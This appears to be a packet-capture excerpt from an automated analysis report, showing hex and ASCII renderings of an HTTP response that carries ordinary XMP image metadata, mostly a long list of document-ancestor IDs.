                                                                                                                                                                                    Data Ascii: indows\MixedReality\FY18Campaign\CHOSEN\Crops\WMR-HMD_GettyImages-563010035_1920x1080.jpg saved&#xA;2018-02-28T10:17:47-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Windows\MixedReality\FY18Campaign\CHOSEN\Crops\WMR-HMD_GettyImages-591782133_1920x1080.jp
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5252INData Raw: 74 6f 72 73 3e 20 3c 72 64 66 3a 42 61 67 3e 20 3c 72 64 66 3a 6c 69 3e 30 30 30 41 42 41 31 41 36 39 39 43 33 38 39 44 35 37 33 44 42 43 30 43 37 39 34 34 44 32 43 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 30 30 45 38 32 31 36 43 31 36 30 37 37 44 45 36 31 33 31 33 32 32 30 36 37 34 44 41 35 31 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 30 31 43 42 39 36 42 37 45 42 45 44 31 44 45 32 39 37 46 30 46 39 42 46 45 43 45 36 46 36 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 30 32 33 39 35 44 45 35 32 34 36 32 31 39 39 32 34 32 37 35 41 33 44 30 43 33 36 43 36 30 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 30 33 46 33 43 41 44 37 39 33 45 31 45 32 43 33 41 41 43 42 32 43 35 41 45 42 42 33 30 32
                                                                                                                                                                                    Data Ascii: tors> <rdf:Bag> <rdf:li>000ABA1A699C389D573DBC0C7944D2C3</rdf:li> <rdf:li>000E8216C16077DE61313220674DA51B</rdf:li> <rdf:li>001CB96B7EBED1DE297F0F9BFECE6F61</rdf:li> <rdf:li>002395DE5246219924275A3D0C36C604</rdf:li> <rdf:li>003F3CAD793E1E2C3AACB2C5AEBB302
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5268INData Raw: 34 43 30 39 46 35 45 31 38 43 42 32 32 33 37 44 30 31 31 32 39 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 44 31 43 37 36 41 31 36 30 42 35 35 30 46 45 32 43 35 35 32 43 36 38 32 44 38 42 44 34 37 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 44 33 38 32 30 39 35 41 37 38 46 44 34 32 30 32 37 35 36 39 31 45 37 33 38 32 34 43 42 38 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 44 34 30 35 35 35 34 38 42 44 32 42 36 46 43 34 31 42 36 44 33 35 44 46 39 42 35 44 44 30 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 44 34 37 43 34 46 34 38 46 42 39 34 38 36 45 41 42 38 35 43 46 46 36 35 37 41 34 30 33 43 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 44 34 45 32 38 35 35 32 45 44 43 38 31 36
                                                                                                                                                                                    Data Ascii: 4C09F5E18CB2237D01129F</rdf:li> <rdf:li>0D1C76A160B550FE2C552C682D8BD470</rdf:li> <rdf:li>0D382095A78FD420275691E73824CB89</rdf:li> <rdf:li>0D4055548BD2B6FC41B6D35DF9B5DD0A</rdf:li> <rdf:li>0D47C4F48FB9486EAB85CFF657A403C8</rdf:li> <rdf:li>0D4E28552EDC816
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5276INData Raw: 36 41 44 36 37 37 33 30 46 43 39 30 44 42 39 39 30 42 30 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 33 32 45 42 38 33 32 45 30 39 30 34 41 35 37 32 34 33 36 41 31 31 33 37 33 37 41 36 44 39 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 33 33 43 39 37 35 32 42 34 31 39 45 35 33 37 31 32 33 31 44 30 33 44 34 32 33 38 32 36 38 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 33 34 39 39 34 32 43 37 44 38 35 41 38 45 30 37 31 43 38 36 38 35 43 42 44 36 45 45 45 36 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 33 35 35 35 38 46 39 36 42 43 33 38 34 39 43 42 30 33 32 39 34 42 38 37 44 38 33 33 38 31 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 33 36 30 31 39 30 33 36 33 45 42 36 34 36 32 32
                                                                                                                                                                                    Data Ascii: 6AD67730FC90DB990B06</rdf:li> <rdf:li>132EB832E0904A572436A113737A6D9E</rdf:li> <rdf:li>133C9752B419E5371231D03D4238268D</rdf:li> <rdf:li>1349942C7D85A8E071C8685CBD6EEE67</rdf:li> <rdf:li>135558F96BC3849CB03294B87D833816</rdf:li> <rdf:li>1360190363EB64622
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5308INData Raw: 3a 6c 69 3e 32 30 45 38 45 45 30 38 42 46 45 33 32 34 37 33 33 45 38 38 43 45 44 35 30 32 38 30 45 35 43 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 30 45 46 38 39 38 43 37 30 39 30 32 34 46 30 36 37 33 30 38 44 42 44 33 45 39 39 32 32 30 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 30 46 30 41 43 31 43 46 42 45 35 42 44 46 45 32 46 35 31 37 31 35 33 45 36 33 43 42 44 44 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 30 46 41 43 36 46 37 39 37 36 35 44 43 35 42 46 38 46 30 32 38 42 35 39 46 39 43 32 32 32 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 30 46 45 39 45 38 35 46 41 33 43 38 42 38 36 45 44 30 33 39 45 45 34 39 39 31 45 35 44 33 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32
                                                                                                                                                                                    Data Ascii: :li>20E8EE08BFE324733E88CED50280E5CF</rdf:li> <rdf:li>20EF898C709024F067308DBD3E992208</rdf:li> <rdf:li>20F0AC1CFBE5BDFE2F517153E63CBDD9</rdf:li> <rdf:li>20FAC6F79765DC5BF8F028B59F9C2229</rdf:li> <rdf:li>20FE9E85FA3C8B86ED039EE4991E5D3D</rdf:li> <rdf:li>2
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5964INData Raw: 44 33 44 46 45 35 31 32 30 35 41 37 31 38 45 33 31 34 38 45 38 37 45 45 38 37 36 37 36 30 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 44 34 35 43 36 44 32 46 44 46 41 39 43 45 37 42 34 44 45 35 37 33 39 44 41 39 43 43 31 32 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 44 34 46 32 44 33 42 34 46 32 46 34 33 35 43 30 39 36 34 30 36 39 41 35 46 35 42 46 31 42 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 44 35 36 30 38 44 44 37 35 43 41 45 33 46 46 30 43 46 43 43 42 38 42 44 34 38 30 35 32 35 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 44 35 43 41 30 43 36 45 44 30 44 32 46 41 35 43 42 41 45 39 45 38 41 43 30 43 37 46 39 35 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 44 35 44 35 42
                                                                                                                                                                                    Data Ascii: D3DFE51205A718E3148E87EE8767601</rdf:li> <rdf:li>2D45C6D2FDFA9CE7B4DE5739DA9CC12E</rdf:li> <rdf:li>2D4F2D3B4F2F435C0964069A5F5BF1BD</rdf:li> <rdf:li>2D5608DD75CAE3FF0CFCCB8BD480525C</rdf:li> <rdf:li>2D5CA0C6ED0D2FA5CBAE9E8AC0C7F95E</rdf:li> <rdf:li>2D5D5B
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6182INData Raw: 44 32 42 30 30 43 36 37 33 45 33 42 42 35 45 30 32 44 43 44 30 37 33 41 31 33 34 35 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 33 33 36 38 46 32 42 42 44 34 35 36 38 36 38 43 33 37 36 32 36 35 39 38 46 37 38 30 39 43 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 33 33 45 43 31 45 38 44 42 39 30 45 46 42 42 36 37 38 33 36 36 41 32 44 32 35 33 36 42 41 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 33 33 45 46 33 41 32 37 42 33 30 46 38 41 34 36 38 32 41 41 33 38 35 32 30 33 41 32 35 45 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 33 35 33 46 46 43 42 38 32 36 43 36 35 44 46 44 36 39 41 34 46 46 34 33 41 38 30 42 32 38 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 33 35 43 35 37 34 35
                                                                                                                                                                                    Data Ascii: D2B00C673E3BB5E02DCD073A13459</rdf:li> <rdf:li>33368F2BBD456868C37626598F7809C9</rdf:li> <rdf:li>333EC1E8DB90EFBB678366A2D2536BAA</rdf:li> <rdf:li>333EF3A27B30F8A4682AA385203A25E1</rdf:li> <rdf:li>3353FFCB826C65DFD69A4FF43A80B281</rdf:li> <rdf:li>335C5745
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6922INData Raw: 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 30 39 31 38 33 34 38 30 44 39 41 30 45 35 36 38 35 37 37 32 42 38 44 46 45 38 35 42 36 37 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 30 39 32 39 38 43 38 31 43 45 31 30 39 35 46 42 34 34 35 37 36 34 36 34 45 37 42 44 35 45 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 30 39 45 43 42 31 35 41 35 36 37 45 44 34 45 35 39 45 39 35 45 36 31 46 39 45 32 43 37 37 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 30 41 31 36 34 43 36 34 31 36 36 44 33 36 42 39 43 41 45 36 42 37 36 30 30 37 36 41 39 35 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 30 42 32 45 44 44 34 36 37 30 41 41 32 32 31 46 34 42 44 46 36 44 36 44 33 44 41 42 34 35 41 3c 2f 72 64 66 3a 6c 69 3e 20
                                                                                                                                                                                    Data Ascii: :li> <rdf:li>409183480D9A0E5685772B8DFE85B67D</rdf:li> <rdf:li>409298C81CE1095FB44576464E7BD5EF</rdf:li> <rdf:li>409ECB15A567ED4E59E95E61F9E2C775</rdf:li> <rdf:li>40A164C64166D36B9CAE6B760076A959</rdf:li> <rdf:li>40B2EDD4670AA221F4BDF6D6D3DAB45A</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7061INData Raw: 35 37 46 31 42 44 43 33 39 32 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 44 43 30 44 33 37 38 43 31 31 35 39 41 38 31 43 42 37 42 46 45 42 32 33 41 32 41 38 34 34 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 44 43 30 46 37 35 39 34 36 30 30 35 46 41 45 38 33 43 30 37 39 36 30 37 31 43 43 46 42 33 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 44 43 31 37 32 33 41 37 34 31 46 36 43 45 36 34 39 46 35 41 33 34 45 32 34 30 35 31 41 39 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 44 43 44 32 43 34 31 44 37 36 45 30 30 31 31 35 42 34 44 36 31 33 30 31 33 33 45 41 42 36 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 44 44 32 36 43 31 32 43 43 42 35 30 33 39 42 46 35 36 46 30 33 35 36 37 34
                                                                                                                                                                                    Data Ascii: 57F1BDC3921</rdf:li> <rdf:li>4DC0D378C1159A81CB7BFEB23A2A8442</rdf:li> <rdf:li>4DC0F75946005FAE83C0796071CCFB31</rdf:li> <rdf:li>4DC1723A741F6CE649F5A34E24051A9E</rdf:li> <rdf:li>4DCD2C41D76E00115B4D6130133EAB6C</rdf:li> <rdf:li>4DD26C12CCB5039BF56F035674
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7176INData Raw: 46 36 46 38 34 34 38 37 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 34 37 31 43 38 33 46 45 36 33 32 44 32 34 34 36 34 45 30 36 35 43 30 31 30 32 35 32 33 36 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 34 37 35 35 31 39 45 30 43 39 33 34 41 39 35 39 46 43 30 34 30 43 34 42 42 41 38 39 36 32 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 34 38 43 30 39 38 33 45 44 33 30 30 43 39 33 43 32 30 30 32 43 36 32 41 45 32 43 43 39 39 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 34 38 46 43 30 34 44 35 33 38 33 38 36 46 46 30 30 39 33 36 39 34 33 31 37 44 36 35 37 32 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 34 41 35 33 44 46 37 39 30 33 45 37 39 42 38 43 36 46 45 38 41 43 33 37 39 31 45
                                                                                                                                                                                    Data Ascii: F6F844871</rdf:li> <rdf:li>5471C83FE632D24464E065C01025236D</rdf:li> <rdf:li>5475519E0C934A959FC040C4BBA8962F</rdf:li> <rdf:li>548C0983ED300C93C2002C62AE2CC994</rdf:li> <rdf:li>548FC04D538386FF0093694317D6572F</rdf:li> <rdf:li>54A53DF7903E79B8C6FE8AC3791E
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7508INData Raw: 45 45 36 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 32 42 39 43 44 43 32 34 31 42 46 33 41 33 39 32 45 38 37 34 45 31 37 37 39 42 37 44 41 37 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 32 42 45 36 46 35 36 39 46 43 43 34 38 42 32 44 45 43 38 34 38 45 42 36 41 44 33 39 41 37 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 32 43 34 46 34 43 46 34 41 35 32 42 41 43 34 39 46 43 44 46 35 34 36 43 30 34 44 30 38 32 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 32 44 37 44 38 45 45 38 35 36 46 32 46 44 41 36 38 39 46 37 43 42 38 36 31 34 41 32 41 35 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 32 45 32 32 45 44 35 34 31 37 44 30 46 30 34 39 37 31 35 43 42 43 41 46 37 36 36 36 45 45 33 3c
                                                                                                                                                                                    Data Ascii: EE60</rdf:li> <rdf:li>62B9CDC241BF3A392E874E1779B7DA7D</rdf:li> <rdf:li>62BE6F569FCC48B2DEC848EB6AD39A76</rdf:li> <rdf:li>62C4F4CF4A52BAC49FCDF546C04D0820</rdf:li> <rdf:li>62D7D8EE856F2FDA689F7CB8614A2A5C</rdf:li> <rdf:li>62E22ED5417D0F049715CBCAF7666EE3<
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7572INData Raw: 44 46 45 31 38 37 30 38 46 41 38 39 37 34 44 46 41 36 37 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 30 41 31 33 31 41 44 41 33 46 30 32 45 46 31 46 35 42 36 39 34 31 38 30 31 32 42 33 46 42 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 30 43 36 41 42 34 41 43 32 41 46 30 37 30 33 39 34 30 38 39 42 36 42 30 46 46 42 37 46 37 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 31 30 37 41 38 33 34 42 31 37 42 46 31 46 43 36 33 38 44 34 43 39 30 35 37 43 32 30 30 45 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 31 31 42 30 37 43 46 32 32 41 33 31 44 30 32 41 35 42 33 37 33 43 42 34 34 36 35 30 34 37 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 31 32 30 35 30 30 45 36 37 43 38 31 37 33 37 32
                                                                                                                                                                                    Data Ascii: DFE18708FA8974DFA679</rdf:li> <rdf:li>70A131ADA3F02EF1F5B69418012B3FBF</rdf:li> <rdf:li>70C6AB4AC2AF070394089B6B0FFB7F7F</rdf:li> <rdf:li>7107A834B17BF1FC638D4C9057C200EB</rdf:li> <rdf:li>711B07CF22A31D02A5B373CB4465047E</rdf:li> <rdf:li>7120500E67C817372
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7580INData Raw: 43 34 39 46 44 41 31 35 34 30 39 44 44 45 37 41 36 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 37 33 42 30 33 30 39 37 42 37 44 34 42 43 44 42 38 37 31 34 43 37 44 46 33 36 45 43 32 36 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 37 34 38 45 43 37 34 41 45 46 32 32 30 42 43 31 44 37 42 37 44 43 44 34 45 45 41 46 33 38 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 37 34 43 45 43 38 39 45 33 41 41 34 44 39 37 44 33 36 31 37 42 30 46 43 30 34 37 33 32 44 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 37 34 45 44 32 41 31 36 33 46 31 45 43 44 36 42 42 37 43 32 33 33 46 46 41 36 34 30 43 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 37 36 33 31 45 33 34 39 44 32 41 33 31 36 35 42 36 37
                                                                                                                                                                                    Data Ascii: C49FDA15409DDE7A64</rdf:li> <rdf:li>773B03097B7D4BCDB8714C7DF36EC264</rdf:li> <rdf:li>7748EC74AEF220BC1D7B7DCD4EEAF384</rdf:li> <rdf:li>774CEC89E3AA4D97D3617B0FC04732DD</rdf:li> <rdf:li>774ED2A163F1ECD6BB7C233FFA640C6B</rdf:li> <rdf:li>77631E349D2A3165B67
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7596INData Raw: 69 3e 38 35 30 42 31 39 44 37 43 32 42 39 42 45 37 41 45 46 46 38 42 30 44 36 34 32 34 32 33 37 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 35 30 43 46 45 31 45 32 38 33 43 39 43 39 39 30 46 46 35 36 42 45 35 34 45 35 45 35 44 30 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 35 31 32 31 44 38 34 32 35 34 31 33 37 34 44 38 44 41 43 41 31 46 31 45 45 38 37 37 30 46 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 35 31 33 44 39 39 46 42 38 30 31 32 46 34 32 46 38 46 33 43 44 30 39 35 44 41 45 34 46 46 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 35 31 44 39 38 44 32 46 31 43 31 38 43 42 46 44 39 41 33 31 35 46 33 36 44 38 32 33 43 38 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 35 32
                                                                                                                                                                                    Data Ascii: i>850B19D7C2B9BE7AEFF8B0D6424237D7</rdf:li> <rdf:li>850CFE1E283C9C990FF56BE54E5E5D0E</rdf:li> <rdf:li>85121D842541374D8DACA1F1EE8770FF</rdf:li> <rdf:li>8513D99FB8012F42F8F3CD095DAE4FF8</rdf:li> <rdf:li>851D98D2F1C18CBFD9A315F36D823C82</rdf:li> <rdf:li>852
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7612INData Raw: 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 32 34 36 43 37 35 30 41 39 42 30 46 32 36 30 39 35 46 46 34 45 38 42 44 35 38 46 42 38 36 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 32 35 46 36 33 31 43 35 31 46 38 31 41 35 36 38 35 43 33 44 41 44 39 43 41 45 42 39 31 33 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 32 37 46 31 46 42 36 38 45 45 45 44 39 39 44 44 43 37 44 32 39 43 33 37 45 31 45 32 36 39 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 32 39 34 41 30 41 32 36 39 31 31 34 37 33 37 34 43 38 43 31 36 43 46 33 39 31 38 32 45 37 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 32 41 33 32 39 34 35 32 36 33 42 41 37 43 43 33 38 31 31 46 41 41 35 31 31 46 41 41 46 34 31 3c 2f 72 64 66
                                                                                                                                                                                    Data Ascii: </rdf:li> <rdf:li>9246C750A9B0F26095FF4E8BD58FB86A</rdf:li> <rdf:li>925F631C51F81A5685C3DAD9CAEB9138</rdf:li> <rdf:li>927F1FB68EEED99DDC7D29C37E1E269A</rdf:li> <rdf:li>9294A0A2691147374C8C16CF39182E7F</rdf:li> <rdf:li>92A32945263BA7CC3811FAA511FAAF41</rdf
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7619INData Raw: 31 37 30 31 35 31 30 34 46 46 36 36 39 34 32 31 44 34 45 35 41 41 36 31 32 44 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 39 31 36 36 35 32 37 46 37 38 31 45 42 41 34 43 42 38 44 41 31 32 33 37 37 30 35 38 38 41 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 39 32 34 39 41 35 36 33 33 46 33 30 45 41 33 34 46 39 35 33 41 31 31 39 44 31 37 30 31 45 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 39 32 35 34 31 44 31 41 44 35 35 32 30 34 36 39 31 41 42 36 43 42 37 42 45 35 44 38 31 32 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 39 33 30 32 34 31 37 36 34 34 34 42 35 30 34 32 46 41 37 44 41 37 46 36 46 31 38 39 31 30 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 39 33 42 36 43 45 31 44 37
                                                                                                                                                                                    Data Ascii: 17015104FF669421D4E5AA612DA</rdf:li> <rdf:li>99166527F781EBA4CB8DA123770588A5</rdf:li> <rdf:li>99249A5633F30EA34F953A119D1701E8</rdf:li> <rdf:li>992541D1AD55204691AB6CB7BE5D812F</rdf:li> <rdf:li>993024176444B5042FA7DA7F6F18910D</rdf:li> <rdf:li>993B6CE1D7
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7635INData Raw: 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 36 36 42 31 39 31 38 43 36 35 39 34 45 43 39 30 42 45 31 42 35 32 46 32 45 43 32 36 46 35 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 36 37 35 38 30 41 31 37 30 44 39 46 37 42 43 43 34 32 39 33 30 41 46 39 36 39 33 30 45 39 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 36 37 38 39 37 38 44 33 34 31 44 33 34 43 42 46 41 45 37 39 41 37 46 35 39 39 39 38 45 43 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 36 37 41 30 30 37 33 38 45 39 30 46 45 30 38 45 43 33 31 44 30 39 45 41 46 45 39 34 32 32 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 36 37 44 38 37 44 42 46 36 46 42 32 42 35 32 45 41 39 32 43 37 39 44 43 37 42 31 45 39 44 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72
                                                                                                                                                                                    Data Ascii: i> <rdf:li>A66B1918C6594EC90BE1B52F2EC26F52</rdf:li> <rdf:li>A67580A170D9F7BCC42930AF96930E9F</rdf:li> <rdf:li>A678978D341D34CBFAE79A7F59998EC4</rdf:li> <rdf:li>A67A00738E90FE08EC31D09EAFE94229</rdf:li> <rdf:li>A67D87DBF6FB2B52EA92C79DC7B1E9D1</rdf:li> <r
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7651INData Raw: 43 46 42 32 39 45 38 34 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 33 45 36 32 32 36 39 35 33 30 33 45 42 37 43 36 36 44 33 43 43 30 35 46 30 41 30 42 45 42 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 33 46 32 30 42 37 37 34 38 37 46 35 39 39 37 34 38 31 39 33 32 42 37 36 34 38 43 44 45 35 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 34 30 44 44 43 39 30 42 37 39 34 35 31 34 31 33 41 37 43 31 38 43 46 41 45 38 43 42 41 42 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 34 32 43 37 36 39 39 37 37 30 33 43 30 43 44 34 37 36 30 35 34 31 33 36 41 44 33 34 43 32 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 34 33 35 46 33 37 41 43 44 34 30 41 33 43 33 37 37 32 46 42 34 33 44 34 34 44 45
                                                                                                                                                                                    Data Ascii: CFB29E84B</rdf:li> <rdf:li>B3E622695303EB7C66D3CC05F0A0BEBE</rdf:li> <rdf:li>B3F20B77487F5997481932B7648CDE5E</rdf:li> <rdf:li>B40DDC90B79451413A7C18CFAE8CBABC</rdf:li> <rdf:li>B42C76997703C0CD476054136AD34C2C</rdf:li> <rdf:li>B435F37ACD40A3C3772FB43D44DE
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7659INData Raw: 36 39 46 31 38 37 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 41 35 33 42 34 31 41 43 46 35 32 33 45 34 33 39 34 30 41 38 36 36 34 37 39 45 30 37 30 31 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 41 37 36 37 41 38 32 44 32 38 38 42 35 42 37 45 33 39 46 45 43 45 38 37 32 37 34 35 31 41 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 41 37 37 32 36 46 35 44 32 38 30 41 34 33 34 38 44 30 38 38 35 43 37 31 32 43 44 42 30 32 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 41 38 34 33 31 38 43 36 44 30 35 34 32 34 31 31 42 44 46 41 37 38 44 36 39 45 38 43 37 45 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 41 38 38 37 36 44 30 46 41 39 34 35 46 43 37 32 41 38 36 36 38 39 33 44 32 37 46 34 33
                                                                                                                                                                                    Data Ascii: 69F1879</rdf:li> <rdf:li>BA53B41ACF523E43940A866479E07018</rdf:li> <rdf:li>BA767A82D288B5B7E39FECE8727451AA</rdf:li> <rdf:li>BA7726F5D280A4348D0885C712CDB021</rdf:li> <rdf:li>BA84318C6D0542411BDFA78D69E8C7E7</rdf:li> <rdf:li>BA8876D0FA945FC72A866893D27F43
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7661INData Raw: 3e 42 42 37 30 41 45 30 42 35 43 31 43 36 31 41 31 45 30 34 37 45 43 42 35 43 46 36 43 44 43 41 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 42 37 35 37 31 41 38 41 46 46 35 39 45 38 46 46 33 44 30 46 43 37 35 35 45 37 37 44 44 44 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 42 37 37 30 37 35 31 39 39 39 42 31 36 38 30 35 44 36 34 32 42 44 45 37 46 36 41 46 33 37 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 42 37 43 38 36 31 43 45 44 42 43 35 45 46 42 31 45 44 45 31 41 36 37 31 33 44 39 31 34 45 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 42 38 31 38 46 43 31 46 44 42 30 43 42 43 46 